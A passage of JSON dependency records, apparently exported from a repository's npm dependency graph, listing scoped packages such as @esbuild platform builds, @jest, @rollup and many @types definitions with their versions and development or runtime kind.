nd":"development","optional":false},{"id":14013847749,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847750,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847751,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847752,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847753,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847754,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-arm@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847755,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847756,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847757,"package_name":"@esbuild","ecosystem":"npm","requirements":"android-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847758,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-arm64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847759,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-arm64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847760,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-arm64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847761,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847762,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847763,"package_name":"@esbuild","ecosystem":"npm","requirements":"darwin-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847764,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-arm64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847765,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-arm64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847766,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-arm64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847767,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847768,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847769,"package_name":"@esbuild","ecosystem":"npm","requirements":"freebsd-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847770,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847771,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847772,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847773,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847774,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847775,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-arm@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847776,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ia32@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847777,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ia32@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847778,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ia32@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847779,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-loong64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847780,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-loong64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847781,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-loong64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847782,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-mips64el@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847783,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-mips64el@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847784,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-mips64el@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847785,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ppc64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847786,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ppc64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847787,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-ppc64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847788,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-riscv64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847789,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-riscv64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847790,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-riscv64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847791,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-s390x@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847792,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-s390x@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847793,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-s390x@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847794,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847795,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847796,"package_name":"@esbuild","ecosystem":"npm","requirements":"linux-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847797,"package_name":"@esbuild","ecosystem":"npm","requirements":"netbsd-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847798,"package_name":"@esbuild","ecosystem":"npm","requirements":"netbsd-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847799,"package_name":"@esbuild","ecosystem":"npm","requirements":"netbsd-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847800,"package_name":"@esbuild","ecosystem":"npm","requirements":"openbsd-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847801,"package_name":"@esbuild","ecosystem":"npm","requirements":"openbsd-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847802,"package_name":"@esbuild","ecosystem":"npm","requirements":"openbsd-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847803,"package_name":"@esbuild","ecosystem":"npm","requirements":"sunos-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847804,"package_name":"@esbuild","ecosystem":"npm","requirements":"sunos-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847805,"package_name":"@esbuild","ecosystem":"npm","requirements":"sunos-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847806,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-arm64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847807,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-arm64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847808,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-arm64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847809,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-ia32@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847810,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-ia32@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847811,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-ia32@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847812,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-x64@0.17.18","direct":false,"kind":"development","optional":false},{"id":14013847813,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-x64@0.18.11","direct":false,"kind":"development","optional":false},{"id":14013847814,"package_name":"@esbuild","ecosystem":"npm","requirements":"win32-x64@0.19.0","direct":false,"kind":"development","optional":false},{"id":14013847815,"package_name":"@eslint-community","ecosystem":"npm","requirements":"eslint-utils@4.4.0(eslint@8.39.0)","direct":false,"kind":"development","optional":false},{"id":14013847816,"package_name":"@eslint-community","ecosystem":"npm","requirements":"regexpp@4.5.0","direct":false,"kind":"development","optional":false},{"id":14013847817,"package_name":"@eslint-community","ecosystem":"npm","requirements":"regexpp@4.8.1","direct":false,"kind":"development","optional":false},{"id":14013847818,"package_name":"@eslint","ecosystem":"npm","requirements":"eslintrc@2.0.2","direct":false,"kind":"development","optional":false},{"id":14013847819,"package_name":"@eslint","ecosystem":"npm","requirements":"js@8.39.0","direct":false,"kind":"development","optional":false},{"id":14013847820,"package_name":"@fastify","ecosystem":"npm","requirements":"ajv-compiler@1.1.0","direct":false,"kind":"development","optional":false},{"id":14013847821,"package_name":"@fastify","ecosystem":"npm","requirements":"error@2.0.0","direct":false,"kind":"development","optional":false},{"id":14013847822,"package_name":"@hapi","ecosystem":"npm","requirements":"hoek@9.3.0","direct":false,"kind":"development","optional":false},{"id":14013847823,"package_name":"@hapi","ecosystem":"npm","requirements":"topo@5.1.0","direct":false,"kind":"development","optional":false},{"id":14013847824,"package_name":"@humanwhocodes","ecosystem":"npm","requirements":"config-array@0.11.8","direct":false,"kind":"development","optional":false},{"id":14013847825,"package_name":"@humanwhocodes","ecosystem":"npm","requirements":"module-importer@1.0.1","direct":false,"kind":"development","optional":false},{"id":14013847826,"package_name":"@humanwhocodes","ecosystem":"npm","requirements":"object-schema@1.2.1","direct":false,"kind":"development","optional":false},{"id":14013847827,"package_name":"@iconify-json","ecosystem":"npm","requirements":"carbon@1.1.16","direct":false,"kind":"development","optional":false},{"id":14013847828,"package_name":"@iconify","ecosystem":"npm","requirements":"types@2.0.0","direct":false,"kind":"development","optional":false},{"id":14013847829,"package_name":"@iconify","ecosystem":"npm","requirements":"utils@2.1.10","direct":false,"kind":"development","optional":false},{"id":14013847830,"package_name":"@istanbuljs","ecosystem":"npm","requirements":"load-nyc-config@1.1.0","direct":false,"kind":"development","optional":false},{"id":14013847831,"package_name":"@istanbuljs","ecosystem":"npm","requirements":"schema@0.1.3","direct":false,"kind":"development","optional":false},{"id":14013847832,"package_name":"@jest","ecosystem":"npm","requirements":"console@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847833,"package_name":"@jest","ecosystem":"npm","requirements":"core@29.5.0(ts-node@10.9.1)","direct":false,"kind":"development","optional":false},{"id":14013847834,"package_name":"@jest","ecosystem":"npm","requirements":"environment@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847835,"package_name":"@jest","ecosystem":"npm","requirements":"expect-utils@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847836,"package_name":"@jest","ecosystem":"npm","requirements":"expect@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847837,"package_name":"@jest","ecosystem":"npm","requirements":"fake-timers@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847838,"package_name":"@jest","ecosystem":"npm","requirements":"globals@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847839,"package_name":"@jest","ecosystem":"npm","requirements":"reporters@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847840,"package_name":"@jest","ecosystem":"npm","requirements":"schemas@29.4.3","direct":false,"kind":"development","optional":false},{"id":14013847841,"package_name":"@jest","ecosystem":"npm","requirements":"source-map@29.4.3","direct":false,"kind":"development","optional":false},{"id":14013847842,"package_name":"@jest","ecosystem":"npm","requirements":"test-result@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847843,"package_name":"@jest","ecosystem":"npm","requirements":"test-sequencer@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847844,"package_name":"@jest","ecosystem":"npm","requirements":"transform@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847845,"package_name":"@jest","ecosystem":"npm","requirements":"types@29.5.0","direct":false,"kind":"development","optional":false},{"id":14013847846,"package_name":"@jridgewell","ecosystem":"npm","requirements":"gen-mapping@0.3.2","direct":false,"kind":"runtime","optional":false},{"id":14013847847,"package_name":"@jridgewell","ecosystem":"npm","requirements":"resolve-uri@3.1.0","direct":false,"kind":"runtime","optional":false},{"id":14013847848,"package_name":"@jridgewell","ecosystem":"npm","requirements":"set-array@1.1.2","direct":false,"kind":"runtime","optional":false},{"id":14013847849,"package_name":"@jridgewell","ecosystem":"npm","requirements":"source-map@0.3.5","direct":false,"kind":"development","optional":false},{"id":14013847850,"package_name":"@jridgewell","ecosystem":"npm","requirements":"sourcemap-codec@1.4.14","direct":false,"kind":"runtime","optional":false},{"id":14013847851,"package_name":"@jridgewell","ecosystem":"npm","requirements":"sourcemap-codec@1.4.15","direct":false,"kind":"runtime","optional":false},{"id":14013847852,"package_name":"@jridgewell","ecosystem":"npm","requirements":"trace-mapping@0.3.17","direct":false,"kind":"runtime","optional":false},{"id":14013847853,"package_name":"@jridgewell","ecosystem":"npm","requirements":"trace-mapping@0.3.9","direct":false,"kind":"runtime","optional":false},{"id":14013847854,"package_name":"@jsdevtools","ecosystem":"npm","requirements":"ono@7.1.3","direct":false,"kind":"development","optional":false},{"id":14013847858,"package_name":"@leichtgewicht","ecosystem":"npm","requirements":"ip-codec@2.0.4","direct":false,"kind":"development","optional":false},{"id":14013847859,"package_name":"@microsoft","ecosystem":"npm","requirements":"tsdoc-config@0.16.2","direct":false,"kind":"development","optional":false},{"id":14013847860,"package_name":"@microsoft","ecosystem":"npm","requirements":"tsdoc@0.14.2","direct":false,"kind":"development","optional":false},{"id":14013847861,"package_name":"@nodelib","ecosystem":"npm","requirements":"fs.scandir@2.1.5","direct":false,"kind":"runtime","optional":false},{"id":14013847862,"package_name":"@nodelib","ecosystem":"npm","requirements":"fs.stat@2.0.5","direct":false,"kind":"runtime","optional":false},{"id":14013847863,"package_name":"@nodelib","ecosystem":"npm","requirements":"fs.walk@1.2.8","direct":false,"kind":"runtime","optional":false},{"id":14013847864,"package_name":"@pkgjs","ecosystem":"npm","requirements":"parseargs@0.11.0","direct":false,"kind":"development","optional":false},{"id":14013847865,"package_name":"@pkgr","ecosystem":"npm","requirements":"utils@2.3.1","direct":false,"kind":"development","optional":false},{"id":14013847866,"package_name":"@polka","ecosystem":"npm","requirements":"url@0.5.0","direct":false,"kind":"development","optional":false},{"id":14013847867,"package_name":"@polka","ecosystem":"npm","requirements":"url@1.0.0-next.21","direct":false,"kind":"development","optional":false},{"id":14013847868,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-babel@5.3.1(@babel","direct":false,"kind":"development","optional":false},{"id":14013847869,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-node-resolve@11.2.1(rollup@2.79.1)","direct":false,"kind":"development","optional":false},{"id":14013847870,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-replace@2.4.2(rollup@2.79.1)","direct":false,"kind":"development","optional":false},{"id":14013847871,"package_name":"@rollup","ecosystem":"npm","requirements":"plugin-typescript@11.1.1(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013847872,"package_name":"@rollup","ecosystem":"npm","requirements":"pluginutils@3.1.0(rollup@2.79.1)","direct":false,"kind":"development","optional":false},{"id":14013847873,"package_name":"@rollup","ecosystem":"npm","requirements":"pluginutils@5.0.2","direct":false,"kind":"development","optional":false},{"id":14013847874,"package_name":"@rollup","ecosystem":"npm","requirements":"pluginutils@5.0.3(rollup@2.79.1)","direct":false,"kind":"development","optional":false},{"id":14013847875,"package_name":"@rollup","ecosystem":"npm","requirements":"pluginutils@5.0.4(rollup@2.79.1)","direct":false,"kind":"development","optional":false},{"id":14013847876,"package_name":"@sideway","ecosystem":"npm","requirements":"address@4.1.4","direct":false,"kind":"development","optional":false},{"id":14013847877,"package_name":"@sideway","ecosystem":"npm","requirements":"formula@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847878,"package_name":"@sideway","ecosystem":"npm","requirements":"pinpoint@2.0.0","direct":false,"kind":"development","optional":false},{"id":14013847879,"package_name":"@sinclair","ecosystem":"npm","requirements":"typebox@0.25.24","direct":false,"kind":"development","optional":false},{"id":14013847880,"package_name":"@sindresorhus","ecosystem":"npm","requirements":"is@4.6.0","direct":false,"kind":"development","optional":false},{"id":14013847881,"package_name":"@sinonjs","ecosystem":"npm","requirements":"commons@2.0.0","direct":false,"kind":"development","optional":false},{"id":14013847882,"package_name":"@sinonjs","ecosystem":"npm","requirements":"fake-timers@10.0.2","direct":false,"kind":"development","optional":false},{"id":14013847883,"package_name":"@surma","ecosystem":"npm","requirements":"rollup-plugin-off-main-thread@2.2.3","direct":false,"kind":"development","optional":false},{"id":14013847884,"package_name":"@szmarczak","ecosystem":"npm","requirements":"http-timer@4.0.6","direct":false,"kind":"development","optional":false},{"id":14013847885,"package_name":"@tootallnate","ecosystem":"npm","requirements":"once@2.0.0","direct":false,"kind":"development","optional":false},{"id":14013847886,"package_name":"@tsconfig","ecosystem":"npm","requirements":"node10@1.0.9","direct":false,"kind":"runtime","optional":false},{"id":14013847887,"package_name":"@tsconfig","ecosystem":"npm","requirements":"node12@1.0.11","direct":false,"kind":"runtime","optional":false},{"id":14013847888,"package_name":"@tsconfig","ecosystem":"npm","requirements":"node14@1.0.3","direct":false,"kind":"runtime","optional":false},{"id":14013847889,"package_name":"@tsconfig","ecosystem":"npm","requirements":"node16@1.0.3","direct":false,"kind":"runtime","optional":false},{"id":14013847890,"package_name":"@types","ecosystem":"npm","requirements":"assert@1.5.6","direct":false,"kind":"runtime","optional":false},{"id":14013847891,"package_name":"@types","ecosystem":"npm","requirements":"babel__core@7.1.19","direct":false,"kind":"development","optional":false},{"id":14013847892,"package_name":"@types","ecosystem":"npm","requirements":"babel__generator@7.6.4","direct":false,"kind":"development","optional":false},{"id":14013847893,"package_name":"@types","ecosystem":"npm","requirements":"babel__template@7.4.1","direct":false,"kind":"development","optional":false},{"id":14013847894,"package_name":"@types","ecosystem":"npm","requirements":"babel__traverse@7.18.2","direct":false,"kind":"development","optional":false},{"id":14013847895,"package_name":"@types","ecosystem":"npm","requirements":"body-parser@1.19.2","direct":false,"kind":"development","optional":false},{"id":14013847896,"package_name":"@types","ecosystem":"npm","requirements":"bonjour@3.5.10","direct":false,"kind":"development","optional":false},{"id":14013847897,"package_name":"@types","ecosystem":"npm","requirements":"braces@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847898,"package_name":"@types","ecosystem":"npm","requirements":"cacheable-request@6.0.2","direct":false,"kind":"development","optional":false},{"id":14013847899,"package_name":"@types","ecosystem":"npm","requirements":"chai-subset@1.3.3","direct":false,"kind":"development","optional":false},{"id":14013847900,"package_name":"@types","ecosystem":"npm","requirements":"chai@4.3.5","direct":false,"kind":"development","optional":false},{"id":14013847901,"package_name":"@types","ecosystem":"npm","requirements":"connect-history-api-fallback@1.3.5","direct":false,"kind":"development","optional":false},{"id":14013847902,"package_name":"@types","ecosystem":"npm","requirements":"connect@3.4.35","direct":false,"kind":"development","optional":false},{"id":14013847903,"package_name":"@types","ecosystem":"npm","requirements":"cors@2.8.13","direct":false,"kind":"development","optional":false},{"id":14013847904,"package_name":"@types","ecosystem":"npm","requirements":"cytoscape@3.19.9","direct":false,"kind":"development","optional":false},{"id":14013847905,"package_name":"@types","ecosystem":"npm","requirements":"d3-array@3.0.3","direct":false,"kind":"development","optional":false},{"id":14013847906,"package_name":"@types","ecosystem":"npm","requirements":"d3-axis@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847907,"package_name":"@types","ecosystem":"npm","requirements":"d3-brush@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847908,"package_name":"@types","ecosystem":"npm","requirements":"d3-chord@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847909,"package_name":"@types","ecosystem":"npm","requirements":"d3-color@3.1.0","direct":false,"kind":"development","optional":false},{"id":14013847910,"package_name":"@types","ecosystem":"npm","requirements":"d3-contour@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847911,"package_name":"@types","ecosystem":"npm","requirements":"d3-delaunay@6.0.1","direct":false,"kind":"development","optional":false},{"id":14013847912,"package_name":"@types","ecosystem":"npm","requirements":"d3-dispatch@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847913,"package_name":"@types","ecosystem":"npm","requirements":"d3-drag@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847914,"package_name":"@types","ecosystem":"npm","requirements":"d3-dsv@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847915,"package_name":"@types","ecosystem":"npm","requirements":"d3-ease@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847916,"package_name":"@types","ecosystem":"npm","requirements":"d3-fetch@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847917,"package_name":"@types","ecosystem":"npm","requirements":"d3-force@3.0.3","direct":false,"kind":"development","optional":false},{"id":14013847918,"package_name":"@types","ecosystem":"npm","requirements":"d3-format@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847919,"package_name":"@types","ecosystem":"npm","requirements":"d3-geo@3.0.2","direct":false,"kind":"development","optional":false},{"id":14013847920,"package_name":"@types","ecosystem":"npm","requirements":"d3-hierarchy@3.1.0","direct":false,"kind":"development","optional":false},{"id":14013847921,"package_name":"@types","ecosystem":"npm","requirements":"d3-interpolate@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847922,"package_name":"@types","ecosystem":"npm","requirements":"d3-path@1.0.9","direct":false,"kind":"development","optional":false},{"id":14013847923,"package_name":"@types","ecosystem":"npm","requirements":"d3-path@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847924,"package_name":"@types","ecosystem":"npm","requirements":"d3-polygon@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847925,"package_name":"@types","ecosystem":"npm","requirements":"d3-quadtree@3.0.2","direct":false,"kind":"development","optional":false},{"id":14013847926,"package_name":"@types","ecosystem":"npm","requirements":"d3-random@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847927,"package_name":"@types","ecosystem":"npm","requirements":"d3-sankey@0.12.1","direct":false,"kind":"development","optional":false},{"id":14013847928,"package_name":"@types","ecosystem":"npm","requirements":"d3-scale-chromatic@3.0.0","direct":false,"kind":"runtime","optional":false},{"id":14013847929,"package_name":"@types","ecosystem":"npm","requirements":"d3-scale@4.0.3","direct":false,"kind":"runtime","optional":false},{"id":14013847930,"package_name":"@types","ecosystem":"npm","requirements":"d3-selection@3.0.5","direct":false,"kind":"development","optional":false},{"id":14013847931,"package_name":"@types","ecosystem":"npm","requirements":"d3-shape@1.3.8","direct":false,"kind":"development","optional":false},{"id":14013847932,"package_name":"@types","ecosystem":"npm","requirements":"d3-shape@3.1.1","direct":false,"kind":"development","optional":false},{"id":14013847933,"package_name":"@types","ecosystem":"npm","requirements":"d3-time-format@4.0.0","direct":false,"kind":"development","optional":false},{"id":14013847934,"package_name":"@types","ecosystem":"npm","requirements":"d3-time@3.0.0","direct":false,"kind":"runtime","optional":false},{"id":14013847935,"package_name":"@types","ecosystem":"npm","requirements":"d3-timer@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847936,"package_name":"@types","ecosystem":"npm","requirements":"d3-transition@3.0.2","direct":false,"kind":"development","optional":false},{"id":14013847937,"package_name":"@types","ecosystem":"npm","requirements":"d3-zoom@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847938,"package_name":"@types","ecosystem":"npm","requirements":"d3@7.4.0","direct":false,"kind":"development","optional":false},{"id":14013847939,"package_name":"@types","ecosystem":"npm","requirements":"debug@4.1.7","direct":false,"kind":"runtime","optional":false},{"id":14013847940,"package_name":"@types","ecosystem":"npm","requirements":"dompurify@3.0.2","direct":false,"kind":"development","optional":false},{"id":14013847941,"package_name":"@types","ecosystem":"npm","requirements":"eslint-scope@3.7.4","direct":false,"kind":"development","optional":false},{"id":14013847942,"package_name":"@types","ecosystem":"npm","requirements":"eslint@8.37.0","direct":false,"kind":"development","optional":false},{"id":14013847943,"package_name":"@types","ecosystem":"npm","requirements":"estree@0.0.39","direct":false,"kind":"development","optional":false},{"id":14013847944,"package_name":"@types","ecosystem":"npm","requirements":"estree@1.0.0","direct":false,"kind":"development","optional":false},{"id":14013847945,"package_name":"@types","ecosystem":"npm","requirements":"express-serve-static-core@4.17.31","direct":false,"kind":"development","optional":false},{"id":14013847946,"package_name":"@types","ecosystem":"npm","requirements":"express-serve-static-core@4.17.33","direct":false,"kind":"development","optional":false},{"id":14013847947,"package_name":"@types","ecosystem":"npm","requirements":"express@4.17.14","direct":false,"kind":"development","optional":false},{"id":14013847948,"package_name":"@types","ecosystem":"npm","requirements":"express@4.17.17","direct":false,"kind":"development","optional":false},{"id":14013847949,"package_name":"@types","ecosystem":"npm","requirements":"flexsearch@0.7.3","direct":false,"kind":"development","optional":false},{"id":14013847950,"package_name":"@types","ecosystem":"npm","requirements":"geojson@7946.0.10","direct":false,"kind":"development","optional":false},{"id":14013847951,"package_name":"@types","ecosystem":"npm","requirements":"glob@7.2.0","direct":false,"kind":"development","optional":false},{"id":14013847952,"package_name":"@types","ecosystem":"npm","requirements":"graceful-fs@4.1.5","direct":false,"kind":"development","optional":false},{"id":14013847953,"package_name":"@types","ecosystem":"npm","requirements":"http-cache-semantics@4.0.1","direct":false,"kind":"development","optional":false},{"id":14013847954,"package_name":"@types","ecosystem":"npm","requirements":"http-proxy@1.17.9","direct":false,"kind":"development","optional":false},{"id":14013847955,"package_name":"@types","ecosystem":"npm","requirements":"istanbul-lib-coverage@2.0.4","direct":false,"kind":"development","optional":false},{"id":14013847956,"package_name":"@types","ecosystem":"npm","requirements":"istanbul-lib-report@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847957,"package_name":"@types","ecosystem":"npm","requirements":"istanbul-reports@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847958,"package_name":"@types","ecosystem":"npm","requirements":"js-yaml@4.0.5","direct":false,"kind":"development","optional":false},{"id":14013847959,"package_name":"@types","ecosystem":"npm","requirements":"jsdom@21.1.1","direct":false,"kind":"development","optional":false},{"id":14013847960,"package_name":"@types","ecosystem":"npm","requirements":"json-schema@7.0.11","direct":false,"kind":"development","optional":false},{"id":14013847961,"package_name":"@types","ecosystem":"npm","requirements":"json-schema@7.0.13","direct":false,"kind":"development","optional":false},{"id":14013847962,"package_name":"@types","ecosystem":"npm","requirements":"keyv@3.1.4","direct":false,"kind":"development","optional":false},{"id":14013847963,"package_name":"@types","ecosystem":"npm","requirements":"linkify-it@3.0.2","direct":false,"kind":"development","optional":false},{"id":14013847964,"package_name":"@types","ecosystem":"npm","requirements":"lodash-es@4.17.7","direct":false,"kind":"development","optional":false},{"id":14013847965,"package_name":"@types","ecosystem":"npm","requirements":"lodash@4.14.194","direct":false,"kind":"development","optional":false},{"id":14013847966,"package_name":"@types","ecosystem":"npm","requirements":"markdown-it@12.2.3","direct":false,"kind":"development","optional":false},{"id":14013847967,"package_name":"@types","ecosystem":"npm","requirements":"markdown-it@13.0.1","direct":false,"kind":"development","optional":false},{"id":14013847968,"package_name":"@types","ecosystem":"npm","requirements":"mdast@3.0.10","direct":false,"kind":"development","optional":false},{"id":14013847969,"package_name":"@types","ecosystem":"npm","requirements":"mdast@3.0.11","direct":false,"kind":"runtime","optional":false},{"id":14013847970,"package_name":"@types","ecosystem":"npm","requirements":"mdurl@1.0.2","direct":false,"kind":"development","optional":false},{"id":14013847971,"package_name":"@types","ecosystem":"npm","requirements":"micromatch@4.0.2","direct":false,"kind":"development","optional":false},{"id":14013847972,"package_name":"@types","ecosystem":"npm","requirements":"mime@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847973,"package_name":"@types","ecosystem":"npm","requirements":"minimatch@5.1.2","direct":false,"kind":"development","optional":false},{"id":14013847974,"package_name":"@types","ecosystem":"npm","requirements":"minimist@1.2.2","direct":false,"kind":"development","optional":false},{"id":14013847975,"package_name":"@types","ecosystem":"npm","requirements":"ms@0.7.31","direct":false,"kind":"runtime","optional":false},{"id":14013847976,"package_name":"@types","ecosystem":"npm","requirements":"node@14.18.29","direct":false,"kind":"development","optional":false},{"id":14013847977,"package_name":"@types","ecosystem":"npm","requirements":"node@18.16.0","direct":false,"kind":"runtime","optional":false},{"id":14013847978,"package_name":"@types","ecosystem":"npm","requirements":"normalize-package-data@2.4.1","direct":false,"kind":"development","optional":false},{"id":14013847979,"package_name":"@types","ecosystem":"npm","requirements":"prettier@2.7.2","direct":false,"kind":"development","optional":false},{"id":14013847980,"package_name":"@types","ecosystem":"npm","requirements":"qs@6.9.7","direct":false,"kind":"development","optional":false},{"id":14013847981,"package_name":"@types","ecosystem":"npm","requirements":"ramda@0.28.25","direct":false,"kind":"runtime","optional":false},{"id":14013847982,"package_name":"@types","ecosystem":"npm","requirements":"range-parser@1.2.4","direct":false,"kind":"development","optional":false},{"id":14013847983,"package_name":"@types","ecosystem":"npm","requirements":"resolve@1.17.1","direct":false,"kind":"development","optional":false},{"id":14013847984,"package_name":"@types","ecosystem":"npm","requirements":"responselike@1.0.0","direct":false,"kind":"development","optional":false},{"id":14013847985,"package_name":"@types","ecosystem":"npm","requirements":"retry@0.12.0","direct":false,"kin